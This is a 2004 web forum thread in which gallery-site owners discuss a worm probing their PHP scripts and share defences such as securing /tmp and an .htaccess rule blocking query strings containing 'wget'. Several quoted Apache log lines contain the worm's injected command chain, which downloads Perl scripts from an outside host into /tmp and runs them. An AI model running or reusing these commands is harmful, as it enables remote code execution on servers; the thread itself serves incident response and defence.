Hello everbody!

I was on holiday the last days, and when I retured, I noticed a HUGE increase of accesses to my EE site. The days before I had an average of 30 distinct visitors per day, and on the 24th the count was up to 544!
When I examined the server log, I found A LOT of entries looking like this:

69.44.157.181 - - [25/Dec/2004:03:28:38 +0100] "GET /gallery/photo.php?photo=2251&exhibition=18&pass=public&size=default&lang=ger/index.php?pass=public&lang=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%2 0ownz.txt;perl%20php.txt HTTP/1.1" 302 3102 "-" "LWP::Simple/5.801"

Has anybody else noticed that kind of accesses on their servers? Is EE vulnerable to this attack? What can EE users about it? After the (successful) attack on Pekka's server I'm VERY sensitive to this kind of problem...

By the way, I'm using Apache on Mandrake Linux...

Martin

They try to use lang variable to run system commands.This will not succeed. Any language that is not installed in EE (three letter code) will give an error message back on the address line, here you get:

http://photography-on-the.net/gallery/photo.php?reverted_to_english_because_language_htt p://www.visualcoders.net/spy.gif?_is_not_available&exhibition=1&lang=eng


To check if they have succeeded check your /tmp folder for any odd scripts.

I get those attacks many times a day (see below), they seem to try all different variables in all installed PHP scripts to find a way to get in. This www.visualcoders.net stuff seems like a robot-driven attack type. Anyways I'll keep checking if there are any such bugs in EE - I have done some and will do it every day. After what I have experienced with phpbb I can assure I take this extremely seriously. SO FAR I CAN TELL EE IS NOT VULNERABLE TO THIS TYPE OF ATTACK.

But, as will all things you should do actions to ensure that even UNKNOWN types of attack can not through to your server. If you run your own server here are few basic things:

See http://www.eth0.us/ and especially "Securing temp directories" and installing "APF firewall" and "rkhunter" in Cpanel section of that site. Also, forbid all outside connections to MySQL (uncomment "skip-networking" in my.cnf) and update PHP to latest with Register_globals = off. Keep all apps and kernel up2date. Rename wget to something that only you know.

Do not use phpbb. Or keep an eye for http://secunia.com/search/?search=phpbb&w=0

Those are the basic measures.

Look also for Apache logs for "wget" or "perl", EXAMPLES FROM MY SITE LOGS:

64.5.44.145 - - [26/Dec/2004:04:03:33 -0600] "GET /forum/showthread.php?t=7283&goto=nextoldest/showthread.php?amp;mode=hybrid&t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%2 0ownz.txt;perl%20php.txt HTTP/1.1" 200 31329
61.8.35.220 - - [26/Dec/2004:04:03:34 -0600] "GET /forum/clientscript/vbulletin_menu.js HTTP/1.1" 304 -

202.57.162.49 - - [26/Dec/2004:04:03:30 -0600] "GET /gallery/photo.php?photo=297&exhibition=2&u=225-1/list.php?exhibition=2&u=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%2 0ownz.txt;perl%20php.txt HTTP/1.1" 200 26460

Note that the exploits always try to RUN a program on your server. Usually this means they download a file with "wget http://foo.com/file.txt" and run it with "perl file.txt". So, keep an eye on your /tmp directory and see if any perl (or txt) files appear there. On my previous server phpbb bug got a worm r0nin on my temp and after I cleaned it the next morning I got several copies of it and other worms (so I closed the server):

hacked /tmp

[root@myserver tmp]# ls -la
total 692
drwxrwxrwt 6 root root 8192 Dec 4 00:59 .
drwxr-xr-x 24 root root 4096 Dec 3 16:59 ..
-rw------- 1 nobody nobody 3266 Nov 23 19:42 169451309441a3e6ff4638e-Z3PO4W
-rw------- 1 nobody nobody 3248 Dec 3 13:17 33874659541b0bbd4044e0-sQ4dJe
-rw------- 1 nobody nobody 3248 Dec 3 13:20 53635743241b0bc7fca0ef-zBEFyf
-rw-r--r-- 1 nobody nobody 20405 Nov 30 14:43 d0s.txt
-rw-r--r-- 1 nobody nobody 20405 Nov 30 14:43 d0s.txt.1
-rw-r--r-- 1 nobody nobody 358 Nov 21 17:36 d.txt
drwxrwxrwt 2 xfs xfs 4096 Dec 3 16:17 .font-unix
drwxrwxrwt 2 root root 4096 Dec 3 16:17 .ICE-unix
drwxr--r-- 2 nobody nobody 4096 Nov 30 16:39 neon
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.1
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:39 neon20.tar.gz.10
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.2
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.3
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.4
-rw------- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.5
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.6
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.7
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.8
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.9
-rwxrwxrwx 1 nobody nobody 19242 Nov 13 13:44 r0nin
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.1
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.10
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.11
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.12
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.13
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.14
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.2
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.3
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.4
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.5
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.6
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.7
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.8
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.9

Now my temp contains some stuff but it's all safe because /tmp is "secured" so that programs can not be run in it

[root@myserver tmp]# ls -la
total 22
drwxrwxrwx 6 root root 1024 Dec 26 13:14 .
drwxr-xr-x 21 root root 4096 Dec 22 05:51 ..
drwxrwxrwt 2 xfs xfs 1024 Dec 22 05:52 .font-unix
drwxrwxrwt 2 root root 1024 Dec 22 05:51 .ICE-unix
drwx------ 2 root root 12288 Dec 6 05:23 lost+found
-rw-r--r-- 1 root root 10 Dec 26 13:12 mailstat-localhost.old
-rwxrwxrwx 1 root root 18 Dec 6 05:55 script
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10642
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10668
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10694
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10720
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10746
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10772
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10798
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10824
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10850
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10876
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10902
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10928
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10954
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10980
-rw------- 1 root root 0 Dec 17 15:17 .shtool.11006

"script" above is my "protection test" script containing a "ls -la" command - as my /tmp is protected it can not be run at all so all is well.
If you suspect a file, seek its filename on Google - you will find what it is.

Thanks very much for the quick reply!

Even if I secured the server well, the attack destroyed the statistics of the server. The photo view counter is totally useless now. Before the attack, the highest counter was about 40, now it's 1100. In the last two hour, since I started this thread, I have another 3000 photo views. Somebody at wordpress.com (see http://wordpress.org/support/7/19285) suggested blocking the worm by modifying the php-script or using .htaccess. This would at least prevent it from generating fake photo views. I already think of parsing the access_log for photos viewed by the worm, and reducing the view count of the affected photos in the database. Another option would be to restore the last database backup, but then normal photo views would be resetted too.

I would not worry about counters...

I would be nice to use mod_rewrite in a .htaccess which would see if URL had string "wget" and it would be redirected to 404 error page or page with php

<?php
for ($n=0; $n<=10000000; $n++) {
sleep(13);
print "\n\r";
}
?>

that would tie the robot up waiting for an answer for a long time :)
I suck with rexexp but I'll see about that: http://httpd.apache.org/docs-2.0/misc/rewriteguide.html

If you know how to code it post it here.

I got it. Here is a rewriterule for .htaccess (if you have mod_rewrite installed) which will redirect all requests with string "wget" in parameter section to google (use any site you like, or local address).

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?

You can see how it works with e.g. http://photography-on-the.net/gallery/photo.php?photo=201&exhibition=1&u=33-2?wget
or
http://photography-on-the.net/gallery/photo.php?wget=12378?photo=201&exhibition=1&u=33-2
or
http://photography-on-the.net/gallery/photo.php?photo=201&exhibition=1&something=wewgetcsd&u=33-2

It's now on for the whole POTN site...

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?



Pekka,

I was following this thread and I think this is a good thing to do. I am not a webmaster wizard but I got it working in my site.

thanks,

[]s
Pedro Luz Cunha
www.pedroluz.com

OK, I'm in the same boat. I tried to copy paste Pekka's htaccess.txt code into my exisiting 1.5RC4 htaccess.txt file but I can't seem to make it redirect....how to you actually get this thing to work..HELP ...PLEASE...my bandwidth is about 6 gigs a day since this attack.... heres the content (minus quotes) of my current htaccess.txt file.

"php_value max_execution_time 180

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?"

OK, I'm in the same boat. I tried to copy paste Pekka's htaccess.txt code into my exisiting 1.5RC4 htaccess.txt file but I can't seem to make it redirect....how to you actually get this thing to work..HELP ...PLEASE...my bandwidth is about 6 gigs a day since this attack.... heres the content (minus quotes) of my current htaccess.txt file.

"php_value max_execution_time 180

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?"

Looks just like mine. Do you have mod_rewrite installed in your Apache? Above won't work without it.

OK, I'm in the same boat. I tried to copy paste Pekka's htaccess.txt code into my exisiting 1.5RC4 htaccess.txt file but I can't seem to make it redirect....how to you actually get this thing to work..HELP ...PLEASE...my bandwidth is about 6 gigs a day since this attack.... heres the content (minus quotes) of my current htaccess.txt file.


Well, What I did is I saved the file in my home directory in my server as '.htaccess' (dot htaccess). But I had to remove the first line,(php_value max_execution_time 180) because I was getting a Server Error, and without it it worked fine.

[]s
Pedro Luz Cunha
www.pedroluz.com

Got it working. I didn't see the file naming convention the first time around...

THANKS PEKKA!!!!

Hello All,

I just read at www.pandasoftware.com that Santy.B is back again in a new variation. Be aware.

[]s
Pedro Cunha
www.pedroluz.com

I keep getting major bandwidth usage from MSNBot. Is there a way to block these useless hits without manually blocking the IP each time?

I can't find any evidence of a worm (nothing in the temp folder) but my gallery just went down after two years of constant use. The error message you get when you try to access the gallery is: "Resource limit exceeded."

My ISP says:

"It is not an issues caused by some kind of hacking activity. It seems that there is something wrong with the gallery script your are using. If this is a third-party script, please consider upgrading to the newest stable version available. If this a script that has been written by you or for you exclusively, please check its code or consult your programmer on this matter. The script is making too many instances of the PHP pages it is loading and at certain point it is starting to overload the server. Then the automatic server protection mechanisms are triggered and no more processes are allowed to be initiated under your hosting account."

Seems strange this would happen all of sudden. I am using 1.5RC4. I am not at home and will reupload the scripts when I get back tomorrow and see if that does it but I would sure like to know what's happening.

The url is www.calvorn.com/gallery

Anybody have any ideas?

Thanks.

Cal

If you have e.g. VPS (Virtuozzo) server it may give a messages like that when predefined server resource limits are eaten. That could be disk space, mysql disk space, files on disk, dozens of limit triggers....

That is definitely not an EE message, you can search the source code and you'll see there is not such message.

Disk space might be spent if you have never cleaned your EE messages or Uncookied data. In that case you could just erase those tables.

Can you get to editor? Can you open PHPmyadmin or any mysql admin tool?

Pekka:

I know it's not an EE message but my ISP says

"The script is making too many instances of the PHP pages it is loading and at certain point it is starting to overload the server. Then the automatic server protection mechanisms are triggered and no more processes are allowed to be initiated under your hosting account."

I have been all through the directories and don't see any files that have been changed or uploaded recently. I can't get to myPHPadmin because it is accessed via the control panel which is a PHP page. I have disabled access to the gallery directory and hopefully all those PHP processes will die and I can see what's going on.

Thanks.

Cal

After going around and around with my ISP they finally admitted their System Administrator had made some changes to the server's configuration file and that's what was causing the errors. Nothing to do with EE or a worm.

I use ICDSoft and have always been pleased with them (I have 12 sites currently hosted with them) but I find the support people try to put the blame on the customer and you have to fight with them to get them to consider that it might be their problem. I believe they use a third party for tech support.

Cal

I got it. Here is a rewriterule for .htaccess (if you have mod_rewrite installed) which will redirect all requests with string "wget" in parameter section to google (use any site you like, or local address).

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?



OK, I've just picked up on this discussion and I have a couple of questions. First, which .htaccess.txt file? The one in the gallery folder or the one in our "hidden" folder? I've added it to both for the time being...

Secondly, how do I deterime if I have mod-rewrite on? I'm a novice at a bunch of this stuff, but I'd like to have my site as secure as possible. I did find a mod_rewrite.so file in the Apache "modules" directory, and a few xml/html files in the manual directory, but I don't know anything else about this.

Thanks in advance,

= Ed =

Hello All,

About the recent 'attack' on EE users, I have had no problems at all, thanks to my server configuration. But I decided to use the same trick Pekka advised us in topic
http://photography-on-the.net/forum/showthread.php?t=51694

where it says:

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?


I just included another line:
'RewriteCond %{QUERY_STRING} toorot'

and for RewriteRule I sent it to nowhere, not to Google.

It seems to work. Anything wrong with it? I mean does it work allright?

[]s
:rolleyes:???

Shouldn't that be:
'RewriteCond %{QUERY_STRING} toroot'

Shouldn't that be:
'RewriteCond %{QUERY_STRING} toroot'

Yes, a slight mistake. ;-)

[]s

I'd really appreciate it if someone would respond here who understands this stuff. Am I suppose to add the RwriteEngine lines to the .htaccess file in my hidden directory, or perhaps my main gallery directcory? Or possibly my root directory for my web pages? Sorry to be so dull on this, but it's just not clear to me. Perhaps I should add it to all 3 places?? :(

= Ed =

OK, I've just picked up on this discussion and I have a couple of questions. First, which .htaccess.txt file? The one in the gallery folder or the one in our "hidden" folder? I've added it to both for the time being...

Secondly, how do I deterime if I have mod-rewrite on? I'm a novice at a bunch of this stuff, but I'd like to have my site as secure as possible. I did find a mod_rewrite.so file in the Apache "modules" directory, and a few xml/html files in the manual directory, but I don't know anything else about this.

Thanks in advance,

= Ed =

...Or possibly my root directory for my web pages? ...

Yep, that's it.